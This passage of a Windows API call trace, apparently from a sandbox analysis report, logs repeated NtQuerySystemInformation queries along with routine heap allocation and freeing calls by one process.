ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.392] GetProcessHeap () returned 0x2026c630000 [0210.392] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804540 [0210.392] GetProcessHeap () returned 0x2026c630000 [0210.392] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d91e0 [0210.392] GetProcessHeap () returned 0x2026c630000 [0210.392] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026d319ff0 [0210.392] GetProcessHeap () returned 0x2026c630000 [0210.392] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026d20cc50 [0210.392] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c6d9830 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8822b0 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c6d9980 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805670 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d8f00 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026c6a75e0 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xf4) returned 0x2026d17c630 [0210.393] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfeb18 | out: phModule=0xc751dfeb18*=0x7ffcea380000) returned 1 [0210.393] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.393] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfecf0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfecf0, ResultLength=0x0) returned 0x0 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8829b0 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.393] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d794630 [0210.393] GetProcessHeap () returned 0x2026c630000 [0210.394] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804f90 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d90c0 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x38) returned 0x2026d882df0 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882f70 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d20cc50 | out: hHeap=0x2026c630000) returned 1 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9980 | out: hHeap=0x2026c630000) returned 1 [0210.394] GetProcessHeap () returned 0x2026c630000 [0210.394] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805670 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d8f00 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6a75e0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d17c630 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794630 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804f90 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d90c0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8829b0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d319ff0 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882f70 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804540 | out: hHeap=0x2026c630000) returned 1 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d91e0 | out: hHeap=0x2026c630000) returned 1 [0210.395] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x2026d6d9110 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804330 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9220 [0210.395] GetProcessHeap () returned 0x2026c630000 [0210.395] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026d319ff0 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026d20cc50 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c6a75e0 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8829b0 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c6a7730 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8053b0 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9150 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6a75e0 | out: hHeap=0x2026c630000) returned 1 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026c6d9830 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.396] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692ff0 [0210.396] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfebf8 | out: phModule=0xc751dfebf8*=0x7ffcea380000) returned 1 [0210.396] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.396] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfed30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfed30, ResultLength=0x0) returned 0x0 [0210.396] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882df0 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d794450 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805670 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9020 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x40) returned 0x2026d7941d0 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d8822b0 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d20cc50 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6a7730 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8053b0 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9150 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8829b0 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692ff0 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794450 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805670 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9020 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7941d0 | out: hHeap=0x2026c630000) returned 1 [0210.397] GetProcessHeap () returned 0x2026c630000 [0210.397] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d319ff0 | out: hHeap=0x2026c630000) returned 1 [0210.398] GetProcessHeap () returned 0x2026c630000 [0210.398] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.398] GetProcessHeap () returned 0x2026c630000 [0210.398] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804330 | out: hHeap=0x2026c630000) returned 1 [0210.398] GetProcessHeap () returned 0x2026c630000 [0210.398] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9220 | out: hHeap=0x2026c630000) returned 1 [0210.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x50, ResultLength=0x0) [0210.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x50, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x38, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x28, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x28, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x28, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe460, Length=0x28, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x28, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x38, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe550, Length=0x28, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe550, Length=0x28, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3f0, Length=0x20, ResultLength=0x0) [0210.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x20, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x20, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe370, Length=0x20, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x38, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x38, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x20, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe440, Length=0x20, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe440, Length=0x20, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.408] GetProcessHeap () returned 0x2026c630000 [0210.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d802de0 [0210.408] GetProcessHeap () returned 0x2026c630000 [0210.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d8eb0 [0210.409] GetProcessHeap () returned 0x2026c630000 [0210.409] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x11c) returned 0x2026c63bb40 [0210.410] GetProcessHeap () returned 0x2026c630000 [0210.410] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x128) returned 0x2026c63c000 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882df0 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026d20cc50 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804d80 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9020 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d319ff0 | out: hHeap=0x2026c630000) returned 1 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1e4) returned 0x2026c6d9830 [0210.411] GetProcessHeap () returned 0x2026c630000 [0210.411] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c692990 [0210.412] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfeb48 | out: phModule=0xc751dfeb48*=0x7ffcea380000) returned 1 [0210.412] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.412] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfec70, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfec70, ResultLength=0x0) returned 0x0 [0210.412] GetProcessHeap () returned 0x2026c630000 [0210.412] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8822b0 [0210.412] GetProcessHeap () returned 0x2026c630000 [0210.412] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x50) returned 0x2026d8601a0 [0210.412] GetProcessHeap () returned 0x2026c630000 [0210.412] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d803d00 [0210.412] GetProcessHeap () returned 0x2026c630000 [0210.412] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d8ed0 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d794630 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63c000 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d20cc50 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804d80 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9020 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692990 | out: hHeap=0x2026c630000) returned 1 